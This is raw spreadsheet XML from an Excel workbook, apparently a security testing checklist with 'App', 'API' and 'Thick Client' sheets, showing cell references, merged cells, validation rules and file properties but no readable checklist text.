    <row r="40" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A40" s="42"/>
      <c r="B40" s="44"/>
      <c r="C40" s="10" t="s">
        <v>193</v>
      </c>
      <c r="D40" s="23" t="s">
        <v>36</v>
      </c>
      <c r="E40" s="1" t="s">
        <v>226</v>
      </c>
      <c r="F40" s="1"/>
      <c r="G40" s="1"/>
    </row>
    <row r="41" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A41" s="13">
        <v>10</v>
      </c>
      <c r="B41" s="15" t="s">
        <v>126</v>
      </c>
      <c r="C41" s="11" t="s">
        <v>127</v>
      </c>
      <c r="D41" s="23" t="s">
        <v>36</v>
      </c>
      <c r="E41" s="1" t="s">
        <v>227</v>
      </c>
      <c r="F41" s="1"/>
      <c r="G41" s="1"/>
    </row>
    <row r="42" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A42" s="40">
        <v>11</v>
      </c>
      <c r="B42" s="35" t="s">
        <v>129</v>
      </c>
      <c r="C42" s="11" t="s">
        <v>130</v>
      </c>
      <c r="D42" s="23" t="s">
        <v>36</v>
      </c>
      <c r="E42" s="1" t="s">
        <v>227</v>
      </c>
      <c r="F42" s="1"/>
      <c r="G42" s="1"/>
    </row>
    <row r="43" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A43" s="41"/>
      <c r="B43" s="35"/>
      <c r="C43" s="11" t="s">
        <v>132</v>
      </c>
      <c r="D43" s="23" t="s">
        <v>36</v>
      </c>
      <c r="E43" s="1" t="s">
        <v>227</v>
      </c>
      <c r="F43" s="1"/>
      <c r="G43" s="1"/>
    </row>
    <row r="44" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A44" s="42"/>
      <c r="B44" s="35"/>
      <c r="C44" s="11" t="s">
        <v>133</v>
      </c>
      <c r="D44" s="23" t="s">
        <v>36</v>
      </c>
      <c r="E44" s="1" t="s">
        <v>227</v>
      </c>
      <c r="F44" s="1"/>
      <c r="G44" s="1"/>
    </row>
    <row r="45" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A45" s="13">
        <v>12</v>
      </c>
      <c r="B45" s="15" t="s">
        <v>134</v>
      </c>
      <c r="C45" s="11" t="s">
        <v>135</v>
      </c>
      <c r="D45" s="23" t="s">
        <v>36</v>
      </c>
      <c r="E45" s="1" t="s">
        <v>227</v>
      </c>
      <c r="F45" s="1"/>
      <c r="G45" s="1"/>
    </row>
    <row r="46" spans="1:7" ht="14.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A46" s="40">
        <v>13</v>
      </c>
      <c r="B46" s="46" t="s">
        <v>159</v>
      </c>
      <c r="C46" s="31" t="s">
        <v>228</v>
      </c>
      <c r="D46" s="23" t="s">
        <v>36</v>
      </c>
      <c r="E46" s="1" t="s">
        <v>227</v>
      </c>
      <c r="F46" s="1"/>
      <c r="G46" s="1"/>
    </row>
    <row r="47" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A47" s="41"/>
      <c r="B47" s="49"/>
      <c r="C47" s="25" t="s">
        <v>160</v>
      </c>
      <c r="D47" s="23" t="s">
        <v>36</v>
      </c>
      <c r="E47" s="1" t="s">
        <v>227</v>
      </c>
      <c r="F47" s="1"/>
      <c r="G47" s="1"/>
    </row>
    <row r="48" spans="1:7" ht="29" x14ac:dyDescent="0.35">
      <c r="A48" s="42"/>
      <c r="B48" s="47"/>
      <c r="C48" s="11" t="s">
        <v>162</v>
      </c>
      <c r="D48" s="23" t="s">
        <v>36</v>
      </c>
      <c r="E48" s="23" t="s">
        <v>227</v>
      </c>
      <c r="F48" s="1"/>
      <c r="G48" s="1"/>
    </row>
    <row r="49" spans="1:7" ht="29" x14ac:dyDescent="0.35">
      <c r="A49" s="13">
        <v>14</v>
      </c>
      <c r="B49" s="30" t="s">
        <v>124</v>
      </c>
      <c r="C49" s="11" t="s">
        <v>125</v>
      </c>
      <c r="D49" s="23" t="s">
        <v>36</v>
      </c>
      <c r="E49" s="1" t="s">
        <v>227</v>
      </c>
      <c r="F49" s="1"/>
      <c r="G49" s="1"/>
    </row>
    <row r="50" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A50" s="36">
        <v>15</v>
      </c>
      <c r="B50" s="48" t="s">
        <v>116</v>
      </c>
      <c r="C50" s="12" t="s">
        <v>117</v>
      </c>
      <c r="D50" s="23" t="s">
        <v>36</v>
      </c>
      <c r="E50" s="1" t="s">
        <v>227</v>
      </c>
      <c r="F50" s="1"/>
      <c r="G50" s="1"/>
    </row>
    <row r="51" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A51" s="36"/>
      <c r="B51" s="48"/>
      <c r="C51" s="20" t="s">
        <v>229</v>
      </c>
      <c r="D51" s="23" t="s">
        <v>36</v>
      </c>
      <c r="E51" s="1" t="s">
        <v>227</v>
      </c>
      <c r="F51" s="1"/>
      <c r="G51" s="1"/>
    </row>
    <row r="52" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A52" s="26">
        <v>16</v>
      </c>
      <c r="B52" s="1" t="s">
        <v>230</v>
      </c>
      <c r="C52" s="1" t="s">
        <v>231</v>
      </c>
      <c r="D52" s="23" t="s">
        <v>36</v>
      </c>
      <c r="E52" s="1" t="s">
        <v>227</v>
      </c>
      <c r="F52" s="1"/>
      <c r="G52" s="1"/>
    </row>
    <row r="53" spans="1:7" ht="29" x14ac:dyDescent="0.35">
      <c r="A53" s="13">
        <v>17</v>
      </c>
      <c r="B53" s="10" t="s">
        <v>232</v>
      </c>
      <c r="C53" s="11" t="s">
        <v>233</v>
      </c>
      <c r="D53" s="23" t="s">
        <v>36</v>
      </c>
      <c r="E53" s="23" t="s">
        <v>234</v>
      </c>
      <c r="F53" s="1"/>
      <c r="G53" s="1"/>
    </row>
    <row r="54" spans="1:7" ht="29" x14ac:dyDescent="0.35">
      <c r="A54" s="40">
        <v>18</v>
      </c>
      <c r="B54" s="46" t="s">
        <v>235</v>
      </c>
      <c r="C54" s="10" t="s">
        <v>236</v>
      </c>
      <c r="D54" s="23" t="s">
        <v>36</v>
      </c>
      <c r="E54" s="23" t="s">
        <v>237</v>
      </c>
      <c r="F54" s="1"/>
      <c r="G54" s="1"/>
    </row>
    <row r="55" spans="1:7" ht="29" x14ac:dyDescent="0.35">
      <c r="A55" s="41"/>
      <c r="B55" s="49"/>
      <c r="C55" s="10" t="s">
        <v>238</v>
      </c>
      <c r="D55" s="23" t="s">
        <v>36</v>
      </c>
      <c r="E55" s="23" t="s">
        <v>237</v>
      </c>
      <c r="F55" s="1"/>
      <c r="G55" s="1"/>
    </row>
    <row r="56" spans="1:7" ht="29" x14ac:dyDescent="0.35">
      <c r="A56" s="41"/>
      <c r="B56" s="49"/>
      <c r="C56" s="11" t="s">
        <v>239</v>
      </c>
      <c r="D56" s="23" t="s">
        <v>36</v>
      </c>
      <c r="E56" s="23" t="s">
        <v>237</v>
      </c>
      <c r="F56" s="1"/>
      <c r="G56" s="1"/>
    </row>
    <row r="57" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A57" s="42"/>
      <c r="B57" s="47"/>
      <c r="C57" s="1" t="s">
        <v>240</v>
      </c>
      <c r="D57" s="23" t="s">
        <v>36</v>
      </c>
      <c r="E57" s="23" t="s">
        <v>237</v>
      </c>
      <c r="F57" s="1"/>
      <c r="G57" s="1"/>
    </row>
    <row r="62" spans="1:7" x14ac:dyDescent="0.35">
      <c r="C62" s="29"/>
    </row>
    <row r="63" spans="1:7" x14ac:dyDescent="0.35">
      <c r="C63" s="28"/>
    </row>
  </sheetData>
  <autoFilter ref="A1:G1" xr:uid="{3A69C1E4-A6EC-47FE-BD35-CA6B29EFEDEB}"/>
  <mergeCells count="24">
    <mergeCell ref="B2:B7"/>
    <mergeCell ref="B32:B34"/>
    <mergeCell ref="B22:B28"/>
    <mergeCell ref="A2:A7"/>
    <mergeCell ref="A8:A18"/>
    <mergeCell ref="A22:A28"/>
    <mergeCell ref="A29:A31"/>
    <mergeCell ref="A32:A34"/>
    <mergeCell ref="B29:B31"/>
    <mergeCell ref="B8:B18"/>
    <mergeCell ref="B19:B20"/>
    <mergeCell ref="A19:A20"/>
    <mergeCell ref="B54:B57"/>
    <mergeCell ref="B38:B40"/>
    <mergeCell ref="A46:A48"/>
    <mergeCell ref="A50:A51"/>
    <mergeCell ref="A54:A57"/>
    <mergeCell ref="B35:B37"/>
    <mergeCell ref="A35:A37"/>
    <mergeCell ref="B42:B44"/>
    <mergeCell ref="B50:B51"/>
    <mergeCell ref="A38:A40"/>
    <mergeCell ref="A42:A44"/>
    <mergeCell ref="B46:B48"/>
  </mergeCells>
  <dataValidations count="2">
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="F2:F5" xr:uid="{17FAC1D2-F845-41C1-B4FE-9327496FD63E}">
      <formula1>$F$2:$F$4</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="G2" xr:uid="{65098ACC-B7C9-42C4-B632-CCC79ED39620}">
      <formula1>$G$2:$G$3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B47E-0D33-4F1E-97DE-F05870DAAE7F}">
  <dimension ref="A1"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="J21" sqref="J21"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.5" x14ac:dyDescent="0.35"/>
  <cols>
    <col min="1" max="1" width="5" customWidth="1"/>
    <col min="2" max="2" width="17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App Checklist</vt:lpstr>
      <vt:lpstr>API Checklist</vt:lpstr>
      <vt:lpstr>Thick Client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Pritee Manohar Mahure</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Vishnu T</cp:lastModifiedBy>
  <cp:revision/>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-02-19T10:38:23Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-05T04:12:17Z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2024-02-19T10:46:58Z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6ed4edbe-aa07-4241-ad17-29dcecf48b73</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="MSIP_Label_8083ca2a-fa5f-423f-8f80-7e27cbcfb750_ContentBits">
    <vt:lpwstr>0</vt:lpwstr>
  </property>
</Properties>
</file>